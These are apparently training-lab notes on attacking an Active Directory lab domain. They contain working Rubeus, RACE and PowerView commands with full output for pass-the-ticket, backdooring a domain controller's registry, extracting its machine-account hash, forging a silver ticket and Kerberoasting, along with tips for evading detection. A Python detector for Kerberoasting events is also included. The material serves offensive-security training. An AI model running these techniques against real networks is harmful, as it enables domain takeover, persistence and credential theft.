With this persistence mechanism we can retrieve the hash of the DC's machine account. Once we have that hash, we can forge silver tickets for services on the DC to obtain domain admin privileges.

This also requires the RACE toolkit and Domain Administrator privileges.

C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True


[*] Username : TTW95PEJ
[*] Domain : 89B3Z8Y2
[*] Password : K4IDDNM1
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 3896
[+] LUID : 0x17ae61

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)


[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 1551969
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

[*] Target LUID: 0x17ae61
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 7/2/2024 6:00:16 AM
EndTime : 7/2/2024 4:00:16 PM
RenewTill : 7/9/2024 6:00:16 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : uJI37jPwPkH7jkGeoKP+9VnSwT1AgO//dIRYIMGHFYA=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new command prompt opens with Domain Administrator privileges.


C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> . C:\Ad\Tools\RACE.ps1
PS C:\Windows\system32> Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student163 -Verbose
VERBOSE: [dcorp-dc : ] Using trustee username 'student163'
VERBOSE: [dcorp-dc] Remote registry is not running, attempting to start
VERBOSE: [dcorp-dc] Attaching to remote registry through StdRegProv
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating the trustee WMI object with user 'student163'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring completed for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating the trustee WMI object with user 'student163'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring completed for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating the trustee WMI object with user 'student163'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring completed for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating the trustee WMI object with user 'student163'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring completed for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating the trustee WMI object with user 'student163'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring completed for key
VERBOSE: [dcorp-dc : SECURITY] Backdooring started for key
VERBOSE: [dcorp-dc : SECURITY] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SECURITY] Creating the trustee WMI object with user 'student163'
VERBOSE: [dcorp-dc : SECURITY] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SECURITY] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [dcorp-dc : SECURITY] Backdooring completed for key
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Backdooring started for key
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Creating the trustee WMI object with user 'student163'
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At C:\Ad\Tools\RACE.ps1:2268 char:13
+ $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Backdooring completed for key
VERBOSE: [dcorp-dc] Backdooring completed for system

ComputerName BackdoorTrustee
------------ ---------------
dcorp-dc student163

Now we extract the hash of the machine account of the domain controller.
PS C:\Windows\system32> Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
VERBOSE: Bootkey/SysKey : BAB78ACD91795C983AEF0534E0DB38C7
VERBOSE: LSA Key : BDC807FEC0BB38EB0AE338451573904220F8B69404F719BDDB03F8618E84005C

ComputerName MachineAccountHash
------------ ------------------
dcorp-dc 81a9ccc2f44b988af78448ad78297ad5

Once we have the machine account hash of the Domain Controller, we can forge silver tickets for any service on that machine.

C:\Users\student163>C:\AD\Tools\Rubeus.exe silver /service:CIFS/dcorp-dc.dollarcorp.moneycorp.local /rc4:81a9ccc2f44b988af78448ad78297ad5 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Build TGS

[*] Trying to query LDAP using LDAPS for user information on domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(samaccountname=Administrator)'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-719815819-3726368948-3917688648-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[*] \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL successfully mounted
[*] Attempting to unmount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[*] \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL successfully unmounted
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[*] \\us.dollarcorp.moneycorp.local\SYSVOL successfully mounted
[*] Attempting to unmount: \\us.dollarcorp.moneycorp.local\SYSVOL
[*] \\us.dollarcorp.moneycorp.local\SYSVOL successfully unmounted
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Retrieving group information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-1028785420-4100948154-1806204659-513))'
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Building PAC

[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (dcorp)
[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 544,512,520,513
[*] ServiceKey : 81A9CCC2F44B988AF78448AD78297AD5
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey : 81A9CCC2F44B988AF78448AD78297AD5
[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5
[*] Service : CIFS
[*] Target : dcorp-dc.dollarcorp.moneycorp.local

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'Administrator' to 'CIFS/dcorp-dc.dollarcorp.moneycorp.local'

[*] AuthTime : 7/2/2024 10:48:46 AM
[*] StartTime : 7/2/2024 10:48:46 AM
[*] EndTime : 7/2/2024 8:48:46 PM
[*] RenewTill : 7/9/2024 10:48:46 AM

[*] base64(ticket.kirbi):


[+] Ticket successfully imported!

C:\Users\student163>klist

Current LogonId is 0:0x14f4b9

Cached Tickets: (1)

#0> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
Server: CIFS/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 7/2/2024 10:48:46 (local)
End Time: 7/2/2024 20:48:46 (local)
Renew Time: 7/9/2024 10:48:46 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:

C:\Users\student163>dir \\dcorp-dc.dollarcorp.moneycorp.local\C$\
Volume in drive \\dcorp-dc.dollarcorp.moneycorp.local\C$ has no label.
Volume Serial Number is 1A5A-FDE2

Directory of \\dcorp-dc.dollarcorp.moneycorp.local\C$

05/08/2021 01:20 AM <DIR> PerfLogs
11/14/2022 11:12 PM <DIR> Program Files
05/08/2021 02:40 AM <DIR> Program Files (x86)
07/02/2024 10:08 AM <DIR> Users
01/10/2024 01:59 AM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 6,019,624,960 bytes free
Domain Privilege Escalation
Kerberoasting
Kerberoasting is a post-compromise attack technique for cracking the passwords of service accounts in Microsoft Active Directory. The attacker, acting as an ordinary domain user, requests a service ticket for an account that has a service principal name (SPN). They then crack the password hash that protects that ticket offline, log in with the plaintext credentials, and advance the attack.

• Offline cracking of service account passwords.

• The Kerberos service ticket has a server portion that is encrypted with the password hash of the service account. This makes it possible to request a ticket and run an offline password attack against it.

As a side note, host SPNs aren't vulnerable to Kerberoasting because the machine account password is a long, complex key that is refreshed every 30 days or less.

How Kerberoasting Works

Service Principal Name (SPN) Enumeration
The attacker enumerates the SPNs in the domain. SPNs are unique identifiers for services running on servers and are used by Kerberos for authentication.

Requesting Service Tickets
The attacker requests a service ticket (TGS - Ticket Granting Service) for a targeted service account using the SPNs. This request does not require elevated privileges and can be performed by any domain user.

Retrieving Encrypted Service Tickets
The Kerberos Key Distribution Center (KDC) issues the service ticket encrypted with the service account's NTLM hash. The attacker receives the encrypted ticket.

Offline Brute-Forcing
The attacker extracts the encrypted portion of the ticket and performs an offline brute-force attack to crack the NTLM hash, revealing the service account's password.
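The four steps above are visible to the KDC as Security event 4769 (a service ticket was requested). As an added example that is not part of the original notes, here is detection logic over constructed 4769-style events: it flags successful RC4 service-ticket requests for SPN-bearing user accounts and bursts of distinct service-ticket requests from one account. The key=value line format, the sqladmin account and the client IP addresses are constructed; the service names mirror the SPN-holding accounts enumerated in this lab.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of event 4769 fields as a SIEM might flatten them (not a real export).
# service = the 4769 "Service Name" (the account that owns the SPN); enc = TicketEncryptionType.
SAMPLE_4769 = """\
time=2024-07-02T10:50:01 account=student163@DOLLARCORP.MONEYCORP.LOCAL service=svcadmin enc=0x17 status=0x0 ip=172.16.100.163
time=2024-07-02T10:50:01 account=student163@DOLLARCORP.MONEYCORP.LOCAL service=websvc enc=0x17 status=0x0 ip=172.16.100.163
time=2024-07-02T10:50:02 account=student163@DOLLARCORP.MONEYCORP.LOCAL service=krbtgt enc=0x17 status=0x0 ip=172.16.100.163
time=2024-07-02T10:50:02 account=student163@DOLLARCORP.MONEYCORP.LOCAL service=DCORP-DC$ enc=0x12 status=0x0 ip=172.16.100.163
time=2024-07-02T11:30:00 account=sqladmin@DOLLARCORP.MONEYCORP.LOCAL service=svcadmin enc=0x12 status=0x0 ip=172.16.3.11
time=2024-07-02T11:31:00 account=DCORP-MGMT$@DOLLARCORP.MONEYCORP.LOCAL service=DCORP-DC$ enc=0x12 status=0x0 ip=172.16.4.44
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")
RC4_HMAC = 0x17        # TicketEncryptionType: 0x11 AES128, 0x12 AES256, 0x17 RC4-HMAC
KDC_SUCCESS = "0x0"    # Failure Code field; anything else is a rejected request


def parse_events(text):
    """Turn the key=value lines into dicts with a datetime and an integer encryption type."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = dict(FIELD_RE.findall(line))
        ev["time"] = datetime.fromisoformat(ev["time"])
        ev["enc"] = int(ev["enc"], 16)
        events.append(ev)
    return events


def is_roastable_service(service):
    """Only user accounts with SPNs are practical targets: machine accounts (name$) have long
    random passwords, and a krbtgt service name is a TGT operation, not a service ticket."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def rc4_service_ticket_requests(events):
    """Successful TGS requests for roastable accounts issued with RC4, the classic signature
    when a client asks for the weakest cipher to make offline cracking cheaper."""
    return [e for e in events
            if e["enc"] == RC4_HMAC and e["status"] == KDC_SUCCESS
            and is_roastable_service(e["service"])]


def roasting_bursts(events, window=timedelta(minutes=5), min_services=2):
    """Accounts that requested tickets for >= min_services distinct roastable services inside
    one window; this also catches AES-only roasting that the RC4 rule misses."""
    per_account = defaultdict(list)
    for e in sorted(events, key=lambda ev: ev["time"]):
        if e["status"] == KDC_SUCCESS and is_roastable_service(e["service"]):
            per_account[e["account"]].append(e)
    alerts = []
    for account, evs in per_account.items():
        for i, first in enumerate(evs):
            in_window = [x for x in evs[i:] if x["time"] - first["time"] <= window]
            services = sorted({x["service"] for x in in_window})
            if len(services) >= min_services:
                alerts.append({"account": account, "start": first["time"], "services": services})
                break   # one alert per account per run is enough for this demonstration
    return alerts


if __name__ == "__main__":
    events = parse_events(SAMPLE_4769)
    for e in rc4_service_ticket_requests(events):
        print(f"RC4 TGS for {e['service']} requested by {e['account']} from {e['ip']}")
    for alert in roasting_bursts(events):
        print(f"burst: {alert['account']} requested {alert['services']} starting {alert['start']}")
```

In a real environment the baseline matters: a service whose account is configured for RC4 only will trigger the RC4 rule on every legitimate client, so the burst rule is the more robust of the two.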

Enumeration
Using PowerView
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> . C:\AD\Tools\PowerView.ps1
PS C:\Windows\system32> Get-DomainUser -SPN

pwdlastset : 11/11/2022 9:59:41 PM


logoncount : 0
badpasswordtime : 12/31/1600 4:00:00 PM
description : Key Distribution Center Service Account
distinguishedname : CN=krbtgt,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
showinadvancedviewonly : True
samaccountname : krbtgt
admincount : 1
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 11/12/2022 6:14:52 AM
instancetype : 4
useraccountcontrol : ACCOUNTDISABLE, NORMAL_ACCOUNT
objectguid : 956ae091-be8d-49da-966b-0daa8d291bb2
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 11/12/2022 5:59:41 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {11/12/2022 6:14:52 AM, 11/12/2022 5:59:41 AM, 1/1/1601 12:04:16 AM}
serviceprincipalname : kadmin/changepw
usncreated : 12300
usnchanged : 12957
memberof : CN=Denied RODC Password Replication Group,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
lastlogon : 12/31/1600 4:00:00 PM
badpwdcount : 0
cn : krbtgt
msds-supportedencryptiontypes : 0
objectsid : S-1-5-21-719815819-3726368948-3917688648-502
primarygroupid : 513
iscriticalsystemobject : True
name : krbtgt

logoncount : 11
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : web svc
lastlogontimestamp : 5/17/2024 10:27:48 PM
userprincipalname : websvc
whencreated : 11/14/2022 12:42:13 PM
samaccountname : websvc
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 5/18/2024 5:27:48 AM
instancetype : 4
usncreated : 38071
objectguid : b7ab147c-f929-4ad2-82c9-7e1b656492fe
sn : svc
lastlogoff : 12/31/1600 4:00:00 PM
msds-allowedtodelegateto : {CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL, CIFS/dcorp-mssql}
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {11/14/2022 12:42:13 PM, 1/1/1601 12:00:00 AM}
serviceprincipalname : {SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL, SNMP/ufc-adminsrv}
givenname : web
usnchanged : 431258
lastlogon : 5/18/2024 3:11:43 AM
badpwdcount : 0
cn : web svc
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, TRUSTED_TO_AUTH_FOR_DELEGATION
objectsid : S-1-5-21-719815819-3726368948-3917688648-1114
primarygroupid : 513
pwdlastset : 11/14/2022 4:42:13 AM
name : web svc

logoncount : 60
badpasswordtime : 5/18/2024 4:20:37 AM
description : Account to be used for services which need high privileges.
distinguishedname : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : svc admin
lastlogontimestamp : 5/17/2024 10:34:40 PM
userprincipalname : svcadmin
samaccountname : svcadmin
admincount : 1
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 5/18/2024 5:34:40 AM
instancetype : 4
usncreated : 40118
objectguid : 244f9c84-7e33-4ed6-aca1-3328d0802db0
sn : admin
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 11/14/2022 5:06:37 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {11/14/2022 5:15:01 PM, 11/14/2022 5:06:37 PM, 1/1/1601 12:00:00 AM}
serviceprincipalname : {MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433,
MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local}
givenname : svc
usnchanged : 439083
memberof : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
lastlogon : 5/18/2024 7:24:47 AM
badpwdcount : 0
cn : svc admin
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
objectsid : S-1-5-21-719815819-3726368948-3917688648-1118
primarygroupid : 513
pwdlastset : 11/14/2022 9:06:37 AM
name : svc admin

Using Active Directory Module


C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat
C:\Windows\system32>set COR_ENABLE_PROFILING=1
C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}
C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> Import-Module C:\Ad\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
PS C:\Windows\system32> Import-Module C:\Ad\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1
PS C:\Windows\system32> Get-ADUser -Filter { ServicePrincipalName -like '*' } -Properties ServicePrincipalName

DistinguishedName : CN=krbtgt,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
Enabled : False
GivenName :
Name : krbtgt
ObjectClass : user
ObjectGUID : 956ae091-be8d-49da-966b-0daa8d291bb2
SamAccountName : krbtgt
ServicePrincipalName : {kadmin/changepw}
SID : S-1-5-21-719815819-3726368948-3917688648-502
Surname :
UserPrincipalName :

DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
Enabled : True
GivenName : web
Name : web svc
ObjectClass : user
ObjectGUID : b7ab147c-f929-4ad2-82c9-7e1b656492fe
SamAccountName : websvc
ServicePrincipalName : {SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL, SNMP/ufc-adminsrv}
SID : S-1-5-21-719815819-3726368948-3917688648-1114
Surname : svc
UserPrincipalName : websvc

DistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
Enabled : True
GivenName : svc
Name : svc admin
ObjectClass : user
ObjectGUID : 244f9c84-7e33-4ed6-aca1-3328d0802db0
SamAccountName : svcadmin
ServicePrincipalName : {MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433,
MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local}
SID : S-1-5-21-719815819-3726368948-3917688648-1118
Surname : admin
UserPrincipalName : svcadmin

PS C:\Windows\system32> Get-ADUser -Filter { ServicePrincipalName -ne "$null" } -Properties ServicePrincipalName

DistinguishedName : CN=krbtgt,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
Enabled : False
GivenName :
Name : krbtgt
ObjectClass : user
ObjectGUID : 956ae091-be8d-49da-966b-0daa8d291bb2
SamAccountName : krbtgt
ServicePrincipalName : {kadmin/changepw}
SID : S-1-5-21-719815819-3726368948-3917688648-502
Surname :
UserPrincipalName :

DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local


Enabled : True
GivenName : web
Name : web svc
ObjectClass : user
ObjectGUID : b7ab147c-f929-4ad2-82c9-7e1b656492fe
SamAccountName : websvc
ServicePrincipalName : {SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL, SNMP/ufc-adminsrv}
SID : S-1-5-21-719815819-3726368948-3917688648-1114
Surname : svc
UserPrincipalName : websvc

DistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local


Enabled : True
GivenName : svc
Name : svc admin
ObjectClass : user
ObjectGUID : 244f9c84-7e33-4ed6-aca1-3328d0802db0
SamAccountName : svcadmin
ServicePrincipalName : {MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433,
MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local}
SID : S-1-5-21-719815819-3726368948-3917688648-1118
Surname : admin
UserPrincipalName : svcadmin

Using Rubeus
We will use Rubeus for Kerberoasting.

List Kerberoasting statistics


C:\Windows\system32>C:\Ad\Tools\Rubeus.exe kerberoast /stats

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Kerberoasting

[*] Listing statistics about target users, no ticket requests being performed.
[*] Target Domain : dollarcorp.moneycorp.local
[*] Searching path 'LDAP://dcorp-
dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for
'(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountContro
l:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 2

-------------------------------------
| Supported Encryption Type | Count |
-------------------------------------
| RC4_HMAC_DEFAULT | 2 |
-------------------------------------

----------------------------------
| Password Last Set Year | Count |
----------------------------------
| 2022 | 2 |
----------------------------------

With Rubeus we can look for kerberoastable accounts that support only RC4-HMAC, which avoids detections
based on a Kerberos encryption-type downgrade (used by products such as MDI; etype 0x17 is RC4-HMAC).
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe kerberoast /stats /rc4opsec

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Kerberoasting

[*] Listing statistics about target users, no ticket requests being performed.
[*] Target Domain : dollarcorp.moneycorp.local
[*] Searching for accounts that only support RC4_HMAC, no AES
[*] Searching path 'LDAP://dcorp-
dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for
'(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountContro
l:1.2.840.113556.1.4.803:=2))(!msds-supportedencryptiontypes:1.2.840.113556.1.4.804:=24))'

[*] Total kerberoastable users : 2

-------------------------------------
| Supported Encryption Type | Count |
-------------------------------------
| RC4_HMAC_DEFAULT | 2 |
-------------------------------------

----------------------------------
| Password Last Set Year | Count |
----------------------------------
| 2022 | 2 |
----------------------------------

Display all kerberoastable users


